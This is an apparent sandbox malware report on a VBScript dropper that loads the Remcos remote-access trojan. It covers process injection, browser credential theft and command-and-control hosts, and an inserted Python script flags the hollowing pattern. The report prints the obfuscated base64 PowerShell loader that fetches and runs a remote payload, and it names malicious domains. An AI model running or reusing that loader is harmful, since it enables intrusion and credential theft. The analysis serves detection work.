                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00442554 mov eax, dword ptr fs:[00000030h]21_2_00442554
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0044E92E GetProcessHeap,21_2_0044E92E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00434168
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00433B44
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00433CD7 SetUnhandledExceptionFilter,21_2_00433CD7

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Windows\System32\wscript.exeNetwork Connect: 45.63.94.214 443
                        Source: Yara matchFile source: amsi64_3704.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi64_7972.amsi.csv, type: OTHER
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 457000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 470000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 476000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 47B000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: C0F008
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: DB6008
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe21_2_00410F36
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00418754 mouse_event,21_2_00418754
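Added example, not part of the Joe Sandbox report: a Python triage script that parses the "Memory written" entries above and flags the process-hollowing pattern they record, namely powershell.exe writing a buffer that begins with 4D5A (the PE "MZ" signature) at 0x400000 inside aspnet_compiler.exe, followed by writes at higher addresses in the same image and further writes outside it. The sample lines are re-typed from this report, with the "Jump to behavior" link residue left on some of them so the parser handles the extracted form; the 1 MiB image span and the minimum number of section writes are assumptions chosen for the example.

```python
import re
from collections import defaultdict

# Constructed sample: the "Memory written" entries of this report, re-typed as
# plain text, with the "Jump to behavior" link residue still attached to some
# lines so the parser is exercised on the extracted form.
SAMPLE_REPORT = r"""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 457000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 470000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 476000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 47B000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: C0F008Jump to behavior
"""

# One report line: "<source>.exeMemory written: <target>.exe base: <hex>[ value starts with: <hex>]".
# The hex classes stop at the first non-hex character, so trailing link text is ignored.
LINE_RE = re.compile(
    r"Source:\s*(?P<source>.+?\.exe)\s*Memory written:\s*(?P<target>.+?\.exe)"
    r"\s*base:\s*(?P<base>[0-9A-Fa-f]+)"
    r"(?:\s*value starts with:\s*(?P<prefix>[0-9A-Fa-f]+))?"
)


def parse_memory_writes(text):
    """Turn report lines into dicts with integer addresses and an upper-cased byte prefix."""
    writes = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            writes.append({
                "source": m["source"],
                "target": m["target"],
                "base": int(m["base"], 16),
                "prefix": (m["prefix"] or "").upper(),
            })
    return writes


def hollowing_candidates(writes, image_span=0x100000, min_section_writes=2):
    """Flag (source, target) pairs where a PE header (4D5A) was written into the
    target and further writes landed just above it, i.e. an image was laid out
    inside a foreign process.  image_span (1 MiB) and min_section_writes are
    assumptions for this example, not values taken from the report."""
    by_pair = defaultdict(list)
    for w in writes:
        by_pair[(w["source"], w["target"])].append(w)
    findings = []
    for (source, target), ws in by_pair.items():
        mz = [w["base"] for w in ws if w["prefix"].startswith("4D5A")]
        if not mz:
            continue
        image_base = min(mz)
        inside = sorted({w["base"] for w in ws
                         if image_base < w["base"] < image_base + image_span})
        outside = sorted({w["base"] for w in ws
                          if not (image_base <= w["base"] < image_base + image_span)})
        if len(inside) < min_section_writes:
            continue
        findings.append({
            "source": source,
            "target": target,
            "image_base": image_base,
            "section_writes": inside,
            "writes_outside_image": outside,
            # 0x400000 is the default image base of a 32-bit PE built without relocation
            "default_32bit_base": image_base == 0x400000,
        })
    return findings


if __name__ == "__main__":
    for f in hollowing_candidates(parse_memory_writes(SAMPLE_REPORT)):
        print(f"{f['source']} -> {f['target']}")
        print(f"  PE header written at {f['image_base']:#x}"
              + (" (default image base of a 32-bit PE)" if f["default_32bit_base"] else ""))
        print("  further writes inside image:", ", ".join(f"{b:#x}" for b in f["section_writes"]))
        print("  writes outside image:", ", ".join(f"{b:#x}" for b in f["writes_outside_image"]))
```

The MZ prefix is what distinguishes this from benign cross-process writes (debuggers, .NET profilers, accessibility tools); the writes outside the image span are reported but not interpreted, since the report does not say what region 0xC0F008 or 0xDB6008 belongs to.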
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = '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';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\haematachometer.vbs"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\paqxrhksjzifkagvqwpv.vbs"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $concessionaries = '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';$neurologically = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($concessionaries));invoke-expression $neurologically
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $concessionaries = 'awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07jhvubwf0zxjuywxsesa9icdodhrwczovl3jlcy5jbg91zgluyxj5lmnvbs9kenzhatg2dwgvaw1hz2uvdxbsb2fkl3yxnzm0mze1mjq0l20zz3ricwt0dm5vy3l2btqxmgfhlmpwzyc7jgjhzg1pbnrvbia9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7jhjvywrtywtlcia9icriywrtaw50b24urg93bmxvywreyxrhkcr1bm1hdgvybmfsbhkpoyrqaxnjzxmgpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkcm9hzg1ha2vyktsky2fwcmlmawn1cya9icc8pejbu0u2nf9tvefsvd4+jzskymlydghlcnmgpsanpdxcqvnfnjrfru5epj4noyrkaxnwb3nlzgx5id0gjfbpc2nlcy5jbmrlee9mkcrjyxbyawzpy3vzktskcgljdhvyzsa9icrqaxnjzxmusw5kzxhpzigkymlydghlcnmpoyrkaxnwb3nlzgx5ic1nzsawic1hbmqgjhbpy3r1cmuglwd0icrkaxnwb3nlzgx5oyrkaxnwb3nlzgx5ics9icrjyxbyawzpy3vzlkxlbmd0adskymvlznn0zwfrid0gjhbpy3r1cmuglsakzglzcg9zzwrsetskcmv0yxbpbmcgpsakuglzy2vzlln1ynn0cmluzygkzglzcg9zzwrseswgjgjlzwzzdgvhayk7jgrpcmvjdglvbnmgpsatam9pbiaojhjldgfwaw5nllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcryzxrhcgluzy5mzw5ndggpxtskymvpbgqgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrkaxjly3rpb25zktskbg93zxjjyxnlzca9ifttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06okxvywqojgjlawxkktskcm9vbwlsesa9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyryb29tawx5lkludm9rzsgkbnvsbcwgqcgnmc9qwhjvss9yl2vllmv0c2fwly86c3b0dggnlcanbxvkd2vlzccsicdtdwr3zwvkjywgj211zhdlzwqnlcanyxnwbmv0x2nvbxbpbgvyjywgj211zhdlzwqnlcdtdwr3zwvkjywnbxvkd2vlzccsj2hhzw1hdgfjag9tzxrlcicsicddolxqcm9ncmftrgf0yvwnlc
doywvtyxrhy2hvbwv0zxinlcd2ynmnlccxjywnmscsj1rhc2toyw1ljykpo2lmicgkbnvsbcatbmugjfbtvmvyc2lvblrhymxlic1hbmqgjfbtvmvyc2lvblrhymxlllbtvmvyc2lvbiatbmugjg51bgwpihsgw3zvawrdjfbtvmvyc2lvblrhymxlllbtvmvyc2lvbib9igvsc2ugeybxcml0zs1pdxrwdxqgj1bvd2vyu2hlbgwgdmvyc2lvbibob3qgyxzhawxhymxljyb9o2lmicgkbnvsbcatbmugjfbtvmvyc2lvblrhymxlic1hbmqgjfbtvmvyc2lvblrhymxlllbtvmvyc2lvbiatbmugjg51bgwpihsgw3zvawrdjfbtvmvyc2lvblrhymxlllbtvmvyc2lvbib9igvsc2ugeybxcml0zs1pdxrwdxqgj1bvd2vyu2hlbgwgdmvyc2lvbibob3qgyxzhawxhymxljyb9ow==';$neurologically = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($concessionaries));invoke-expression $neurologicallyJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $concessionaries = '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';$neurologically = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($concessionaries));invoke-expression $neurologicallyJump to behavior
                        Source: aspnet_compiler.exe, 0000000F.00000002.2892055901.0000000000FB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: aspnet_compiler.exe, 0000000F.00000002.2892055901.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, logs.dat.15.drBinary or memory string: [Program Manager]
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00433E0A cpuid 21_2_00433E0A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,21_2_004470AE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,21_2_004510BA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,21_2_004511E3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,21_2_004512EA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,21_2_004513B7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,21_2_00447597
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoA,21_2_0040E679
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,21_2_00450A7F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,21_2_00450CF7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,21_2_00450D42
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,21_2_00450DDD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,21_2_00450E6A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00434010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,21_2_00434010
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0041A7A2 GetUserNameW,21_2_0041A7A2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,21_2_0044800F
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        Source: Yara match | File source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000F.00000002.2892055901.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000F.00000002.2896720400.0000000002C1F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000015.00000002.2876508990.0000000001248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: aspnet_compiler.exe PID: 7924, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: aspnet_compiler.exe PID: 4544, type: MEMORYSTR
                        Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 21_2_0040B21B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 21_2_0040B335
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: \key3.db 21_2_0040B335

                        Remote Access Functionality

                        Source: Yara match | File source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000F.00000002.2892055901.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000F.00000002.2896720400.0000000002C1F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000015.00000002.2876508990.0000000001248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: aspnet_compiler.exe PID: 7924, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: aspnet_compiler.exe PID: 4544, type: MEMORYSTR
                        Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: cmd.exe 21_2_00405042
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information321
                        Scripting
                        Valid Accounts1
                        Native API
                        321
                        Scripting
                        1
                        DLL Side-Loading
                        1
                        Deobfuscate/Decode Files or Information
                        1
                        OS Credential Dumping
                        2
                        System Time Discovery
                        Remote Services11
                        Archive Collected Data
                        1
                        Web Service
                        Exfiltration Over Other Network Medium1
                        System Shutdown/Reboot
                        CredentialsDomainsDefault Accounts1
                        Exploitation for Client Execution
                        1
                        DLL Side-Loading
                        1
                        Bypass User Account Control
                        3
                        Obfuscated Files or Information
                        211
                        Input Capture
                        1
                        Account Discovery
                        Remote Desktop Protocol211
                        Input Capture
                        12
                        Ingress Tool Transfer
                        Exfiltration Over Bluetooth1
                        Defacement
                        Email AddressesDNS ServerDomain Accounts3
                        Command and Scripting Interpreter
                        1
                        Windows Service
                        1
                        Access Token Manipulation
                        1
                        DLL Side-Loading
                        2
                        Credentials In Files
                        1
                        System Service Discovery
                        SMB/Windows Admin Shares3
                        Clipboard Data
                        21
                        Encrypted Channel
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts2
                        Service Execution
                        Login Hook1
                        Windows Service
                        1
                        Bypass User Account Control
                        NTDS3
                        File and Directory Discovery
                        Distributed Component Object ModelInput Capture1
                        Non-Standard Port
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud Accounts2
                        PowerShell
                        Network Logon Script322
                        Process Injection
                        1
                        Masquerading
                        LSA Secrets33
                        System Information Discovery
                        SSHKeylogging2
                        Non-Application Layer Protocol
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                        Virtualization/Sandbox Evasion
                        Cached Domain Credentials21
                        Security Software Discovery
                        VNCGUI Input Capture113
                        Application Layer Protocol
                        Data Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Access Token Manipulation
                        DCSync21
                        Virtualization/Sandbox Evasion
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job322
                        Process Injection
                        Proc Filesystem3
                        Process Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                        Application Window Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                        System Owner/User Discovery
                        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        Behavior Graph ID: 1576754 | Sample: BBVA S.A..vbs | Start date: 17/12/2024 | Architecture: WINDOWS | Score: 100
                        
                        • Start (node 2): contacts paste.ee, rem.pushswroller.eu and 3 other IPs or domains; signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 14 other signatures; starts wscript.exe (node 9) and wscript.exe (node 13)
                        • paste.ee: Connects to a pastebin service (likely for C&C)
                        • wscript.exe (node 9): contacts paste.rs 45.63.94.214, 443, 49713, 49790 AS-CHOOPAUS United States; signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 2 other signatures; starts powershell.exe (node 15)
                        • wscript.exe (node 13): signature: System process connects to network (likely due to code injection or exploit); starts powershell.exe (node 19)
                        • powershell.exe (node 15): contacts paste.ee 104.21.84.67, 443, 49784, 49880 CLOUDFLARENETUS United States; signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes; starts aspnet_compiler.exe (node 21), cmd.exe (node 26) and conhost.exe (node 28)
                        • powershell.exe (node 19): starts conhost.exe (node 30), aspnet_compiler.exe (node 32) and aspnet_compiler.exe (node 34)
                        • aspnet_compiler.exe (node 21): contacts rem.pushswroller.eu 45.80.158.30, 23101, 49795, 49829 UK2NET-ASGB Netherlands and geoplugin.net 178.237.33.50, 49803, 80 ATOM86-ASATOM86NL Netherlands; dropped C:\Users\user\...\paqxrhksjzifkagvqwpv.vbs (data) and C:\ProgramData\remcos\logs.dat (data); signatures: Contains functionality to bypass UAC (CMSTPLUA); Contains functionalty to change the wallpaper; Contains functionality to steal Chrome passwords or cookies; 4 other signatures; starts wscript.exe (node 36)
                        • cmd.exe (node 26): dropped C:\ProgramData\haematachometer.vbs (Unicode); signature: Command shell drops VBS files; starts conhost.exe (node 38)

                        Source | Detection | Scanner | Label | Link
                        BBVA S.A..vbs | 8% | ReversingLabs | Win32.Trojan.Generic |
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        Source | Detection | Scanner | Label | Link
                        firewarzone.ydns.eu | 100% | Avira URL Cloud | malware |
                        sun.drillmmcsnk.eu | 100% | Avira URL Cloud | malware |
                        https://paste.rs/LDDIb | 0% | Avira URL Cloud | safe |
                        rem.pushswroller.eu | 100% | Avira URL Cloud | malware |
                        https://paste.rs/LDDIb8 | 0% | Avira URL Cloud | safe |
                        https://paste.rs/LDDIbt; | 0% | Avira URL Cloud | safe |
                        https://paste.rs/LDDIbs | 0% | Avira URL Cloud | safe |
                        https://paste.rs/ | 0% | Avira URL Cloud | safe |
                        Name | IP | Active | Malicious | Antivirus Detection | Reputation
                        paste.rs | 45.63.94.214 | true | false | | high
                        paste.ee | 104.21.84.67 | true | false | | high
                        rem.pushswroller.eu | 45.80.158.30 | true | true | | unknown
                        geoplugin.net | 178.237.33.50 | true | false | | high
                        res.cloudinary.com | unknown | unknown | false | | high
                        Name | Malicious | Antivirus Detection | Reputation
                        http://geoplugin.net/json.gp | false | | high
                        firewarzone.ydns.eu | true | Avira URL Cloud: malware | unknown
                        sun.drillmmcsnk.eu | true | Avira URL Cloud: malware | unknown
